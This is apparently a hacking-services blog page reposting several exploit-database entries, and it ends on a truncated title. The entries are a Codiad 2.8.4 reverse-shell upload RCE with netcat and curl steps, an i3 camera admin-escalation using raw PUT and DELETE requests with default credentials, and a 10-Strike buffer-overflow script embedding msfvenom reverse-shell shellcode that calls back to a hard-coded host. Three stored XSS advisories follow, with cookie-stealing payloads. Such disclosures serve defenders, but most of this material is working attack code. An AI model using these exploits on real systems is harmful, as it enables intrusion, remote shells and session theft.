# Exploit Title: Codiad 2.8.4 - Remote Code Execution (Authenticated) (4)
# Author: P4p4_M4n3
# Vendor Homepage: http://codiad.com/
# Software Links : https://github.com/Codiad/Codiad/releases
# Type: WebApp
###################-------------------------##########################------------###################
# Proof of Concept: #
# #
# 1- login on codiad #
# #
# 2- go to themes/default/filemanager/images/codiad/manifest/files/codiad/example/INF/" directory #
# #
# 3- right click and select upload file #
# #
# 4- click on "Drag file or Click Here To Upload" and select your reverse_shell file #
# #
###################-------------------------#########################-------------###################
after that your file should be in INF directory, right click on your file and select delete,
and you will see the full path of your file
run it in your terminal with "curl" and boom!!
/var/www/html/codiad/themes/default/filemanager/images/codiad/manifest/files/codiad/example/INF/shell.php
1 - # nc -lnvp 1234
2 - curl http://target_ip/codiad/themes/default/filemanager/images/codiad/manifest/files/codiad/example/INF/shell.php -u "admin:P@ssw0rd"
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863122038
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: i3 International Annexxus Cameras Ax-n 5.2.0 - Application Logic Flaw
# Date: 27.10.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.i3international.com
i3 International Annexxus Cameras Ax-n 5.2.0 Application Logic Flaw
Vendor: i3 International Inc.
Product web page: https://www.i3international.com
Affected version: V5.2.0 build 150317 (Ax46)
V5.0.9 build 151106 (Ax68)
V5.0.9 build 150615 (Ax78)
Summary: The Annexxus camera 6MP provides 4 simultaneous,
independently controlled digital pan-tilt-zoom (ePTZ) video
streams, which may be recorded or viewed live as well as a
built-in microphone and speaker allowing two way communication.
Desc: The application doesn't allow creation of more than one
administrator account on the system. This also applies for
deletion of the administrative account. The logic behind this
restriction can be bypassed by parameter manipulation using
dangerous verbs like PUT and DELETE and improper server-side
validation. Once a normal account with 'viewer' or 'operator'
permissions has been added by the default admin user 'i3admin',
a PUT request can be issued calling the 'UserPermission' endpoint
with the ID of created account and set it to 'admin' userType,
successfully adding a second administrative account.
Tested on: App-webs/
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5688
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5688.php
27.10.2021
--
Make user ID 3 an Administrator:
--------------------------------
PUT /PSIA/Custom/SelfExt/UserPermission/3 HTTP/1.1
Host: 192.168.1.1
Content-Length: 556
Cache-Control: max-age=0
Accept: */*
X-Requested-With: XMLHttpRequest
If-Modified-Since: 0
Authorization: Basic aTNhZG1pbjppM2FkbWlu
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Origin: http://192.168.1.1
Referer: http://192.168.1.1/doc/setup.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: i3userInfo80=aTNhZG1pbjppM2FkbWlu; i3userName80=i3admin
Connection: close
<?xml version='1.0' encoding='utf-8'?><UserPermission><id>3</id><userID>3</userID><userType>admin</userType><remotePermission><playBack>true</playBack><preview>true</preview><record>true</record><ptzControl>true</ptzControl><upgrade>true</upgrade><parameterConfig>true</parameterConfig><restartOrShutdown>true</restartOrShutdown><logOrStateCheck>true</logOrStateCheck><voiceTalk>true</voiceTalk><transParentChannel>true</transParentChannel><contorlLocalOut>true</contorlLocalOut><alarmOutOrUpload>true</alarmOutOrUpload></remotePermission></UserPermission>
HTTP/1.1 200 OK
Date: Wed, 27 Oct 2021 14:13:56 GMT
Server: App-webs/
Connection: close
Content-Length: 238
Content-Type: application/xml
<?xml version="1.0" encoding="UTF-8"?>
<ResponseStatus version="1.0" xmlns="urn:psialliance-org">
<requestURL>/PSIA/Custom/SelfExt/UserPermission/3</requestURL>
<statusCode>1</statusCode>
<statusString>OK</statusString>
</ResponseStatus>
Delete Administrator user ID 3:
-------------------------------
DELETE /PSIA/Security/AAA/users/3 HTTP/1.1
Host: 192.168.1.1
Cache-Control: max-age=0
Accept: */*
X-Requested-With: XMLHttpRequest
If-Modified-Since: 0
Authorization: Basic aTNhZG1pbjppM2FkbWlu
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Origin: http://192.168.1.1
Referer: http://192.168.1.1/doc/setup.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: i3userInfo80=aTNhZG1pbjppM2FkbWlu; i3userName80=i3admin
Connection: close
HTTP/1.1 200 OK
Date: Wed, 27 Oct 2021 14:20:17 GMT
Server: App-webs/
Connection: close
Content-Length: 213
Content-Type: application/xml
<?xml version="1.0" encoding="UTF-8"?>
<ResponseStatus version="1.0" xmlns="urn:psialliance-org">
<requestURL>/PSIA/Security/AAA/users/3</requestURL>
<statusCode>1</statusCode>
<statusString>OK</statusString>
</ResponseStatus>
# Exploit Title: 10-Strike Network Inventory Explorer Pro 9.31 - Buffer Overflow (SEH)
# Date: 2021-10-31
# Exploit Author: ro0k
# Vendor Homepage: https://www.10-strike.com/
# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe
# Version: 9.31
# Tested on: Windows 10 x64 Education 21H1 Build 19043.928
# Proof of Concept:
# 1.Run python2 exploit.py to generate overflow.txt
# 2.Transfer overflow.txt to the Windows 10 machine
# 3.Setup Netcat listener on attacker machine
# 4.Open 10-Strike Network Inventory Explorer Pro
# 5.Select Computers tab from the uppermost set of tabs
# 6.Select From Text File option
# 7.Open overflow.txt
# 8.Receive reverse shell connection on attacker machine!
#!/usr/bin/env python
import struct
charslist = ""
badchars = [0x00,0x09,0x0a,0x0d,0x3a,0x5c]
for i in range (0x00, 0xFF+1):
if i not in badchars:
charslist += chr(i)
#msfvenom -p windows/shell_reverse_tcp LHOST=10.2.170.242 LPORT=443 EXITFUNC=thread -f c -a x86 -b "\x00\x09\x0a\x0d\x3a\x5c"
shellcode = ("\xd9\xc8\xd9\x74\x24\xf4\x58\x33\xc9\xbb\xc6\xbc\xd3\x19\xb1"
"\x52\x83\xc0\x04\x31\x58\x13\x03\x9e\xaf\x31\xec\xe2\x38\x37"
"\x0f\x1a\xb9\x58\x99\xff\x88\x58\xfd\x74\xba\x68\x75\xd8\x37"
"\x02\xdb\xc8\xcc\x66\xf4\xff\x65\xcc\x22\xce\x76\x7d\x16\x51"
"\xf5\x7c\x4b\xb1\xc4\x4e\x9e\xb0\x01\xb2\x53\xe0\xda\xb8\xc6"
"\x14\x6e\xf4\xda\x9f\x3c\x18\x5b\x7c\xf4\x1b\x4a\xd3\x8e\x45"
"\x4c\xd2\x43\xfe\xc5\xcc\x80\x3b\x9f\x67\x72\xb7\x1e\xa1\x4a"
"\x38\x8c\x8c\x62\xcb\xcc\xc9\x45\x34\xbb\x23\xb6\xc9\xbc\xf0"
"\xc4\x15\x48\xe2\x6f\xdd\xea\xce\x8e\x32\x6c\x85\x9d\xff\xfa"
"\xc1\x81\xfe\x2f\x7a\xbd\x8b\xd1\xac\x37\xcf\xf5\x68\x13\x8b"
"\x94\x29\xf9\x7a\xa8\x29\xa2\x23\x0c\x22\x4f\x37\x3d\x69\x18"
"\xf4\x0c\x91\xd8\x92\x07\xe2\xea\x3d\xbc\x6c\x47\xb5\x1a\x6b"
"\xa8\xec\xdb\xe3\x57\x0f\x1c\x2a\x9c\x5b\x4c\x44\x35\xe4\x07"
"\x94\xba\x31\x87\xc4\x14\xea\x68\xb4\xd4\x5a\x01\xde\xda\x85"
"\x31\xe1\x30\xae\xd8\x18\xd3\xdb\x1e\x88\xd1\xb4\x1c\xcc\x14"
"\xfe\xa8\x2a\x7c\x10\xfd\xe5\xe9\x89\xa4\x7d\x8b\x56\x73\xf8"
"\x8b\xdd\x70\xfd\x42\x16\xfc\xed\x33\xd6\x4b\x4f\x95\xe9\x61"
"\xe7\x79\x7b\xee\xf7\xf4\x60\xb9\xa0\x51\x56\xb0\x24\x4c\xc1"
"\x6a\x5a\x8d\x97\x55\xde\x4a\x64\x5b\xdf\x1f\xd0\x7f\xcf\xd9"
"\xd9\x3b\xbb\xb5\x8f\x95\x15\x70\x66\x54\xcf\x2a\xd5\x3e\x87"
"\xab\x15\x81\xd1\xb3\x73\x77\x3d\x05\x2a\xce\x42\xaa\xba\xc6"
"\x3b\xd6\x5a\x28\x96\x52\x7a\xcb\x32\xaf\x13\x52\xd7\x12\x7e"
"\x65\x02\x50\x87\xe6\xa6\x29\x7c\xf6\xc3\x2c\x38\xb0\x38\x5d"
"\x51\x55\x3e\xf2\x52\x7c")
#pattern_offset.rb -l 250 -q 41316841
offset = 213
#nasm > jmp short 8
nseh = "\xeb\x06\x90\x90"
junk = "A" * (offset - len(nseh))
#0x61e012f6 : pop edi # pop ebp # ret | {PAGE_EXECUTE_READ} [sqlite3.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.12.2 (C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\sqlite3.dll)
seh = struct.pack("<I", 0x61e012f6)
#metasm > sub esp,0x10
subesp10="\x83\xec\x10"
payload = shellcode
buffer = junk + nseh + seh + subesp10 + payload
f = open("overflow.txt", "w")
f.write(buffer)
f.close()
# Exploit Title: PHPJabbers Simple CMS 5 - 'name' Persistent Cross-Site Scripting (XSS)
# Google Dork: subtitle:Copyright © 2021 PHPJabbers.com
# Date: 2021-10-28
# Exploit Author: Vulnerability-Lab
# Vendor Homepage: https://www.phpjabbers.com/faq.php
# Software Link: https://www.phpjabbers.com/simple-cms/
# Version: v5
# Tested on: Linux
Document Title:
===============
PHPJabbers Simple CMS v5 - Persistent XSS Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2300
Release Date:
=============
2021-10-28
Vulnerability Laboratory ID (VL-ID):
====================================
2300
Common Vulnerability Scoring System:
====================================
5.4
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
A simple PHP content management system for easy web content editing and publishing. Our PHP Content Management System script is designed
to provide you with powerful yet easy content administration tools. The smart CMS lets you create and manage multiple types of web sections
and easily embed them into your website. You can upload a wide range of files and add users with different user access levels. Get the
Developer License and customize the script to fit your specific needs.
(Copy of the Homepage:https://www.phpjabbers.com/simple-cms/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent input validation vulnerability in the PHPJabbers Simple CMS v5.0 web-application.
Affected Product(s):
====================
PHPJabbers
Product: PHPJabbers Simple CMS v5.0 - (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-28: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (Moderator Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the in the PHPJabbers Simple CMS v5.0 web-application.
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise
browser to web-application requests from the application-side.
The persistent vulnerability is located in the create (pjActionCreate) and update (pjActionUpdate) post method request.
Privileged authenticated accounts with ui access are able to inject own malicious script code as name for users.
The script code execution is performed after the inject via post method in the user list (pjAdminUsers).
Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external
redirects to malicious source and persistent manipulation of affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Create (Add)
[+] Update
Vulnerable Parameter(s):
[+] pjActionCreate
[+] pjActionUpdate
Affected Module(s):
[+] pjAdminUsers
Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by remote attackers with privilged user accounts with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Payloads
"><img src=evil.source onload=alert(document.cookie)>
"><img src=evil.source onload=alert(document.domain)>
--- PoC Session Logs (POST) [Add & Update]
https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionCreate
Host: phpjabbers-cms.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 178
Origin:https://phpjabbers-cms.localhost:8080
Connection: keep-alive
Referer:https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionCreate
Cookie: PHPSESSID=1u09ltqr9cm9fivco678g5rdk6; pj_sid=PJ1.0.9421452714.1630949247; pj_so=PJ1.0.8128760084.1630949247;
_gcl_au=1.1.1647551187.1630949248; __zlcmid=15wkJNPYavCwzgx; simpleCMS=5if2dl1gd2siru197tojj4r7u5;
pjd=f9843n906jef7det6cn5shusd1; pjd_1630949262_438=1
user_create=1&role_id=2&email=test@ftp.world&password=test2&name=r"><img src=evil.source onload=alert(document.cookie)>§ion_allow=1&file_allow=1&status=T
-
POST: HTTP/1.1 303
Server: Apache/2.2.15 (CentOS)
Location: /1630949262_438/index.php?controller=pjAdminUsers&action=pjActionIndex&err=AU03
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
--
https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionUpdate
Host: phpjabbers-cms.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 180
Origin:https://phpjabbers-cms.localhost:8080
Connection: keep-alive
Referer:https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionUpdate&id=2
Cookie: PHPSESSID=1u09ltqr9cm9fivco678g5rdk6; pj_sid=PJ1.0.9421452714.1630949247; pj_so=PJ1.0.8128760084.1630949247;
_gcl_au=1.1.1647551187.1630949248; __zlcmid=15wkJNPYavCwzgx; simpleCMS=5if2dl1gd2siru197tojj4r7u5;
pjd=f9843n906jef7det6cn5shusd1; pjd_1630949262_438=1
user_update=1&id=2&role_id=2&email=test@test.de&password=test&name=r"><img src=evil.source onload=alert(document.cookie)>§ion_allow=1&file_allow=1&status=T
-
POST: HTTP/1.1 303
Server: Apache/2.2.15 (CentOS)
Location:https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionIndex&err=AU01
Keep-Alive: timeout=10, max=83
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
https://phpjabbers-cms.localhost:8080/1630949262_438/evil.source
Host: phpjabbers-cms.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer:https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionIndex&err=AU03
Cookie: PHPSESSID=1u09ltqr9cm9fivco678g5rdk6; pj_sid=PJ1.0.9421452714.1630949247; pj_so=PJ1.0.8128760084.1630949247;
_gcl_au=1.1.1647551187.1630949248; __zlcmid=15wkJNPYavCwzgx; simpleCMS=5if2dl1gd2siru197tojj4r7u5;
pjd=f9843n906jef7det6cn5shusd1; pjd_1630949262_438=1
-
GET: HTTP/1.1 200 OK
Server: Apache/2.2.15 (CentOS)
Content-Length: 380
Keep-Alive: timeout=10, max=89
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Vulnerable Source: index.php?controller=pjAdminUsers (&action=pjActionIndex&err=AU03)
<select data-name="status" style="display: none;" class="pj-form-field pj-form-select pj-selector-editable"><option value="T">Active</option>
<option value="F">Inactive</option></select></td><td><a href="index.php?controller=pjAdminUsers&action=pjActionUpdate&id=1"
class="pj-table-icon-edit"></a></td></tr><tr class="pj-table-row-even" data-id="id_3"><td><input type="checkbox" name="record[]" value="3"
class="pj-table-select-row"></td><td class="pj-table-cell-editable">
<span class="pj-table-cell-label">r"><img src="evil.source" onload="alert(document.cookie)"></img></span>
<input type="text" data-name="name" style="display: none;" class="pj-form-field pj-form-text
pj-selector-editable" value="r"><img src=evil.source onload=alert(document.cookie)>"></td><td class="pj-table-cell-editable">
<span class="pj-table-cell-label">test@ftp.world</span><input type="text" data-name="email" style="display: none;"
class="pj-form-field pj-form-text pj-selector-editable" value="test@ftp.world"></td><td><span class="pj-table-cell-label">06-09-2021</span></td>
<td><span class="pj-table-cell-label"><span class="label-status user-role-editor">editor</span></span></td><td class="pj-table-cell-editable">
<span class="pj-table-cell-label pj-status pj-status-T">Active</span><select data-name="status" style="display: none;"
class="pj-form-field pj-form-select pj-selector-editable"><option value="T">Active</option><option value="F">Inactive</option></select></td>
<td><a href="index.php?controller=pjAdminUsers&action=pjActionUpdate&id=3" class="pj-table-icon-edit"></a>
<a href="index.php?controller=pjAdminUsers&action=pjActionDeleteUser&id=3" class="pj-table-icon-delete"></a></td></tr></tbody></table>
Reference(s):
https://phpjabbers-cms.localhost:8080/
https://phpjabbers-cms.localhost:8080/1630949262_438/
https://phpjabbers-cms.localhost:8080/1630949262_438/index.php
https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionUpdate
https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionCreate
Credits & Authors:
==================
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
# Exploit Title: WordPress Plugin Hotel Listing 3 - 'Multiple' Cross-Site Scripting (XSS)
# Date: 2021-10-28
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://hotel.eplug-ins.com/
# Software Link: https://hotel.eplug-ins.com/hoteldoc/
# Version: v3
# Tested on: Linux
Document Title:
===============
Hotel Listing (WP Plugin) v3.x - MyAccount XSS Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2277
Release Date:
=============
2021-10-28
Vulnerability Laboratory ID (VL-ID):
====================================
2277
Common Vulnerability Scoring System:
====================================
5.3
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
Hotel, Motel , Bar & Restaurant Listing Plugin + Membership plugin using Wordpress with PHP and MySQL Technologie.
(Copy of the Homepage:https://hotel.eplug-ins.com/hoteldoc/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple persistent cross site vulnerabilities in the official Hotel Listing v3.x wordpress plugin web-application.
Affected Product(s):
====================
e-plugins
Product: Hotel Listing v3.x - Plugin Wordpress (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-08-19: Researcher Notification & Coordination (Security Researcher)
2021-08-20: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-28: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (Guest Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities has been discovered in the official Hotel Listing v3.x wordpress plugin web-application.
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to
web-application requests from the application-side.
The vulnerabilities are located in add new listing - address, city, zipcode, country and location input fields of the my-account module.
Remote attackers can register a low privileged application user account to inject own malicious script codes with persistent attack vector to
hijack user/admin session credentials or to permanently manipulate affected modules. The execute of the malicious injected script code takes
place in the frontend on preview but as well in the backend on interaction to edit or list (?&profile=all-post) by administrative accounts.
The request method to inject is post and the attack vector is persistent located on the application-side.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Add New Listing
Vulnerable Input(s):
[+] address
[+] city
[+] zipcode
[+] country
Affected Module(s):
[+] Frontend on Preview (All Listings)
[+] Backend on Preview (All Listings) or Edit
Proof of Concept (PoC):
=======================
The persistent web vulnerabilities can be exploited by remote attackers with privilged user accounts with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Exploitation: Payload
%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E
Vulnerable Source: new-listing
<div class=" form-group row">
<div class="col-md-6 ">
<label for="text" class=" control-label col-md-4 ">Address</label>
<input type="text" class="form-control col-md-8 " name="address" id="address" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
placeholder="Enter address Here">
</div>
<div class=" col-md-6">
<label for="text" class=" control-label col-md-4">Area</label>
<input type="text" class="form-control col-md-8" name="area" id="area" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
placeholder="Enter Area Here">
</div>
</div>
<div class=" form-group row">
<div class="col-md-6 ">
<label for="text" class=" control-label col-md-4">City</label>
<input type="text" class="form-control col-md-8" name="city" id="city" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
placeholder="Enter city ">
</div>
<div class=" col-md-6">
<label for="text" class=" control-label col-md-4">Zipcode</label>
<input type="text" class="form-control col-md-8" name="postcode" id="postcode" value="<[MALICIOUS SCRIPT CODE PAYLOAD!]>">>""
placeholder="Enter Zipcode ">
</div>
</div>
<div class=" form-group row">
<div class=" col-md-6">
<label for="text" class=" control-label col-md-4">State</label>
<input type="text" class="form-control col-md-8" name="state" id="state" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
placeholder="Enter State ">
</div>
<div class=" col-md-6">
<label for="text" class=" control-label col-md-4">Country</label>
<input type="text" class="form-control col-md-8" name="country" id="country" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
placeholder="Enter Country ">
</div>
--- PoC Session Logs (POST) ---
http://hotel-eplug-ins.localhost:8000/wp-admin/admin-ajax.php
Host: hotel-eplug-ins.localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1603
Origin:http://hotel-eplug-ins.localhost:8000
Connection: keep-alive
Referer:http://hotel-eplug-ins.localhost:8000/my-account-2/?profile=new-listing
-
action=iv_directories_save_listing&form_data=cpt_page=hotel&title=test1&new_post_content=test2&logo_image_id=&feature_image_id=
&gallery_image_ids=&post_status=pending&postcats%5B%5D=&address=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&area=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&
city=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&postcode=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&
state=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&country=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&
latitude=&longitude=&new_tag=&phone=&fax=&contact-email=&contact_web=&award_title%5B%5D=&award_description%5B%5D=&
award_year%5B%5D=&menu_title%5B%5D=&menu_description%5B%5D=&menu_price%5B%5D=&menu_order%5B%5D=&room_title%5B%5D=&room_description%5B%5D=&room_price%5B%5D=&
room_order%5B%5D=&override_bookingf=no&booking_stcode=&youtube=&vimeo=&facebook=&linkedin=&twitter=&gplus=&pinterest=&instagram=&Rooms=&suites=&
Rating_stars=&CHECK_IN=&CHECK_out=&Cancellation=&Pets=&Children_and_Extra_Beds=&day_name%5B%5D=Monday+&day_value1%5B%5D=&
day_value2%5B%5D=&event-title=&event-detail=++&event_image_id=&user_post_id=&_wpnonce=50241bc992
-
POST: HTTP/1.1 200 OK
Server: nginx/1.18.0
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin:http://hotel-eplug-ins.localhost:8000
Access-Control-Allow-Credentials: true
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Content-Encoding: gzip
-
http://hotel-eplug-ins.localhost:8000/my-account-2/?&profile=all-post
Host: hotel-eplug-ins.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer:http://hotel-eplug-ins.localhost:8000/my-account-2/?profile=new-listing
-
GET: HTTP/1.1 200 OK
Server: nginx/1.18.0
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Location:http://hotel-eplug-ins.localhost:8000/my-account-2/?profile=all-post
Solution - Fix & Patch:
=======================
1. Encode and parse all vulnerable input fields on transmit via post method request
2. Restrict the input fields to disallow usage of special chars
3. Encode and escape the output content in the edit and list itself to prevent the execution point
Security Risk:
==============
The security risk of the persistent cross site scripting web vulnerability in the hotel listing application is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
# Exploit Title: WordPress Plugin Popup Anything 2.0.3 - 'Multiple' Stored Cross-Site Scripting (XSS)
# Date: 03/11/2021
# Exploit Author: Luca Schembri
# Vendor Homepage: https://www.essentialplugin.com/
# Software Link: https://wordpress.org/plugins/popup-anything-on-click/
# Version: < 2.0.4
** Summary **
A user with a low privileged user can perform XSS-Stored attacks.
** Plugin description **
Popup Anything is the best popup builder and marketing plugin that
helps you get more email subscribers, increase sales and grow your
business.
Manage powerful modal popup for your WordPress blog or website. You
can add an unlimited popup with your configurations.
** Vulnerable page **
http://{WEBSITE}/wp-admin/post.php?post={ID}&action=edit
** PoC **
Go on the "Popup Anything - Settings" tab and select "Simple Link" as
"Link Type". Select "Link Test" and use this payload:
test" onclick="alert(1)
Save the popup and reload the page. Now click on "Link Text" and it
will execute the javascript code
The same attack can be exploited with "Button Text" and "Popup width" fields.
** Remediation **
Upgrade to 2.0.4 version or later
# Exploit Title: Eclipse Jetty 11.0.5 - Sensitive File Disclosure
# Date: 2021-11-03
